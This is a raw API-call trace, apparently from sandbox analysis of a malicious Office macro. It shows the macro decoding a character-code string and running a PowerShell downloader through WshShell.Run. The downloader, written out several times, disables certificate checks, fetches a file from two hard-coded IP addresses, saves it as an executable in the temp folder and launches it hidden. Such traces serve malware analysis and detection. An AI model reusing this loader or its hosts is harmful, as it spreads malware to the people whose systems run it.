VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.615] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.616] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.616] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.616] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.616] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.617] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.617] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.617] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.617] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.617] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.618] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.618] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.618] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.619] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.619] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.619] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.619] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.620] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.620] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.620] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.620] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.620] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.621] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.621] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.621] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.622] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.622] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.622] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.623] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.623] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.623] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.623] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.623] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.623] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.624] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.624] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.624] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.625] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.625] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.625] VarAdd (in: pvarLeft=0x80f6610, pvarRight=0x80f6628, pvarResult=0x80f65f8 | out: pvarResult=0x80f65f8) returned 0x0 [0047.625] VarAdd (in: pvarLeft=0x80f6798, pvarRight=0x80f6758, pvarResult=0x80f6740 | out: pvarResult=0x80f6740) returned 0x0 [0047.625] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1)", bstrRight="{break;} };<#validate component#>start-process ($env:temp+'\\fulezad.exe') -windowstyle hidden;\"", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.625] WshShell:IDispatch:GetIDsOfNames (in: This=0x9805050, riid=0x7fee40278a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x205f10*="Run", cNames=0x1, lcid=0x409, rgDispId=0x205ef4 | out: rgDispId=0x205ef4*=1000) returned 0x0 [0047.656] WshShell:IDispatch:Invoke (in: This=0x9805050, dispIdMember=1000, riid=0x7fee40278a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x205ea8*(rgvarg=([0]=0x80f6680*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6f, varVal2=0x0), [1]=0x80f6698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\\fulezad.exe') -windowstyle hidden;\"", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x80f66b0, pExcepInfo=0x205ec0, puArgErr=0x205ea0 | out: pDispParams=0x205ea8*(rgvarg=([0]=0x80f6680*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6f, varVal2=0x0), [1]=0x80f6698*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\\fulezad.exe') -windowstyle hidden;\"", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x80f66b0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x205ec0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x205ea0*=0x409) returned 0x0 [0049.407] WshShell:IUnknown:Release (This=0x9805050) returned 0x0 [0049.430] IMalloc:Free (This=0x7feff045380, pv=0x7fc2180) [0049.808] GetCapture () returned 0x0 [0049.808] GetCursorPos (in: lpPoint=0x20f240 | out: lpPoint=0x20f240*(x=12, y=70)) returned 1 [0049.808] WindowFromPoint (Point=0x460000000c) returned 0x201c6 [0049.809] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x94c [0049.809] SendMessageA (hWnd=0x201c6, Msg=0x84, wParam=0x0, lParam=0x46000c) returned 0x1 [0049.809] SendMessageA (hWnd=0x201c6, Msg=0x20, wParam=0x201c6, lParam=0x2000001) returned 0x0 [0217.463] IMalloc:Free (This=0x7feff045380, pv=0x8110030) [0217.463] IUnknown:Release (This=0x7edf740) returned 0xc [0217.463] IUnknown:Release (This=0x3dd7b80) returned 0x28 [0217.463] IUnknown:Release (This=0x7ee0550) returned 0x7 [0217.463] IUnknown:Release (This=0x7edffb0) returned 0x5 [0217.464] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.464] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.464] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.464] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000035d) returned 1 [0217.464] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.465] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x204) returned 0x7fee3dfd760 [0217.465] GetCurrentProcess () returned 0xffffffffffffffff [0217.465] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b7f4, dwSize=0x3b) returned 1 [0217.465] RtlLookupFunctionEntry (in: ControlPc=0x813b7f4, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813b83c [0217.465] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.465] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.465] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.465] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000035e) returned 1 [0217.465] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.466] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x2cc) returned 0x7fee3fd24c8 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b8ec, dwSize=0x4b) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813b8ec, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813b944 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813ba0c, dwSize=0x4c) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813ba0c, ImageBase=0x209438, HistoryTable=0x209440 | out: ImageBase=0x209438, HistoryTable=0x209440) returned 0x813ba68 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813baac, dwSize=0x4c) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813baac, ImageBase=0x209438, HistoryTable=0x209440 | out: ImageBase=0x209438, HistoryTable=0x209440) returned 0x813bb08 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bb64, dwSize=0x54) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813bb64, ImageBase=0x209438, HistoryTable=0x209440 | out: ImageBase=0x209438, HistoryTable=0x209440) returned 0x813bbc8 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bc74, dwSize=0x4c) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813bc74, ImageBase=0x209438, HistoryTable=0x209440 | out: ImageBase=0x209438, HistoryTable=0x209440) returned 0x813bcd0 [0217.466] GetCurrentProcess () returned 0xffffffffffffffff [0217.466] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bd2c, dwSize=0x4c) returned 1 [0217.466] RtlLookupFunctionEntry (in: ControlPc=0x813bd2c, ImageBase=0x209438, HistoryTable=0x209440 | out: ImageBase=0x209438, HistoryTable=0x209440) returned 0x813bd88 [0217.466] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.466] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.466] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.466] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000035f) returned 1 [0217.466] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.467] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x260) returned 0x7fee3dfae28 [0217.467] GetCurrentProcess () returned 0xffffffffffffffff [0217.467] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bf7c, dwSize=0x43) returned 1 [0217.467] RtlLookupFunctionEntry (in: ControlPc=0x813bf7c, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813bfcc [0217.467] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.467] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.467] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.467] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000360) returned 1 [0217.467] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.468] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x278) returned 0x7fee3dfd6f0 [0217.468] GetCurrentProcess () returned 0xffffffffffffffff [0217.468] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813c0f8, dwSize=0x53) returned 1 [0217.468] RtlLookupFunctionEntry (in: ControlPc=0x813c0f8, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813c158 [0217.468] CExposedDocFile::Release () returned 0x3 [0217.468] CExposedDocFile::Release () returned 0x2 [0217.468] CExposedDocFile::Release () returned 0x1 [0217.468] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.468] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.468] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.469] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000361) returned 1 [0217.469] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.469] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x204) returned 0x7fee3dfd760 [0217.469] GetCurrentProcess () returned 0xffffffffffffffff [0217.469] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b7f4, dwSize=0x3b) returned 1 [0217.469] RtlLookupFunctionEntry (in: ControlPc=0x813b7f4, ImageBase=0x209378, HistoryTable=0x209380 | out: ImageBase=0x209378, HistoryTable=0x209380) returned 0x813b83c [0217.469] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.469] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.469] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.470] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000362) returned 1 [0217.470] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.470] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x2cc) returned 0x7fee3fd24c8 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b8ec, dwSize=0x4b) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813b8ec, ImageBase=0x209378, HistoryTable=0x209380 | out: ImageBase=0x209378, HistoryTable=0x209380) returned 0x813b944 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813ba0c, dwSize=0x4c) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813ba0c, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813ba68 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813baac, dwSize=0x4c) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813baac, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813bb08 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bb64, dwSize=0x54) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813bb64, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813bbc8 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bc74, dwSize=0x4c) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813bc74, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813bcd0 [0217.470] GetCurrentProcess () returned 0xffffffffffffffff [0217.470] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bd2c, dwSize=0x4c) returned 1 [0217.470] RtlLookupFunctionEntry (in: ControlPc=0x813bd2c, ImageBase=0x2093d8, HistoryTable=0x2093e0 | out: ImageBase=0x2093d8, HistoryTable=0x2093e0) returned 0x813bd88 [0217.470] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.470] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.471] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.471] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000363) returned 1 [0217.471] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.471] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x260) returned 0x7fee3dfae28 [0217.471] GetCurrentProcess () returned 0xffffffffffffffff [0217.471] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813bf7c, dwSize=0x43) returned 1 [0217.471] RtlLookupFunctionEntry (in: ControlPc=0x813bf7c, ImageBase=0x209378, HistoryTable=0x209380 | out: ImageBase=0x209378, HistoryTable=0x209380) returned 0x813bfcc [0217.471] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.471] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0217.471] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee3c90000 [0217.472] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000364) returned 1 [0217.472] SetErrorMode (uMode=0x8001) returned 0x8001 [0217.472] GetProcAddress (hModule=0x7fee3c90000, lpProcName=0x278) returned 0x7fee3dfd6f0 [0217.472] GetCurrentProcess () returned 0xffffffffffffffff [0217.472] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813c0f8, dwSize=0x53) returned 1 [0217.472] RtlLookupFunctionEntry (in: ControlPc=0x813c0f8, ImageBase=0x209378, HistoryTable=0x209380 | out: ImageBase=0x209378, HistoryTable=0x209380) returned 0x813c158 [0217.472] IMalloc:Free (This=0x7feff045380, pv=0x8188430) [0217.472] IMalloc:Free (This=0x7feff045380, pv=0x7d55490) [0217.473] GetCurrentThreadId () returned 0x94c [0217.473] SetCursor (hCursor=0x10007) returned 0x10003 [0217.473] CExposedDocFile::Release () returned 0x1 [0217.473] CExposedDocFile::Release () returned 0x0 [0217.473] CExposedDocFile::Release () returned 0x0 [0217.474] GetCurrentThreadId () returned 0x94c [0217.474] GetCurrentThreadId () returned 0x94c [0217.474] IUnknown:Release (This=0x7f722f0) returned 0x1 [0217.474] IUnknown:Release (This=0x7f7aa08) returned 0x3 [0217.474] IUnknown:Release (This=0x7f7ab68) returned 0x2 [0217.474] IUnknown:Release (This=0x7f7aab8) returned 0x2 [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x8116560) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55d90) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55d50) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55d10) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55cd0) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55c10) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7fc20e0) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55690) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7fc2090) [0217.474] IMalloc:Free (This=0x7feff045380, pv=0x7d55610) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x7d55a90) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x7d584d0) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3ea42f0) [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x81d9534, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x81d95ec, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x81d9bb4, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x81d9c74, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813ae7c, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813af34, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b0cc, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b194, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b31c, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b3dc, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b56c, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x811c9e0) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x8061af0) [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x81d8a3c, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x0 [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x811c830) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x81f9bb0) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6c860) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6ddf0) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x81f9310) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x81fa000) [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b8ec, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x813b944 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813bf7c, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x813bfcc [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813c0f8, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x813c158 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813b7f4, ImageBase=0x209bd0, HistoryTable=0x209bf0 | out: ImageBase=0x209bd0, HistoryTable=0x209bf0) returned 0x813b83c [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x81f8ec0) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6f380) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6e690) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6e240) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6ef30) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x3e6eae0) [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813bb64, ImageBase=0x209c10, HistoryTable=0x209c30 | out: ImageBase=0x209c10, HistoryTable=0x209c30) returned 0x813bbc8 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813ba0c, ImageBase=0x209c10, HistoryTable=0x209c30 | out: ImageBase=0x209c10, HistoryTable=0x209c30) returned 0x813ba68 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813baac, ImageBase=0x209c10, HistoryTable=0x209c30 | out: ImageBase=0x209c10, HistoryTable=0x209c30) returned 0x813bb08 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813bc74, ImageBase=0x209c10, HistoryTable=0x209c30 | out: ImageBase=0x209c10, HistoryTable=0x209c30) returned 0x813bcd0 [0217.475] RtlLookupFunctionEntry (in: ControlPc=0x813bd2c, ImageBase=0x209c10, HistoryTable=0x209c30 | out: ImageBase=0x209c10, HistoryTable=0x209c30) returned 0x813bd88 [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x81f9760) [0217.475] IMalloc:Free (This=0x7feff045380, pv=0x813a740) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7dff0c0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7e02420) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7e14b30) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e4320) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81348e0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x817bc70) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e83f0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x3dbd210) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e4020) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x7fc2130) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x817bcf0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x817bcb0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x81e40e0) [0217.476] IMalloc:Free (This=0x7feff045380, pv=0x817bd10) [0217.476] IMalloc:Free 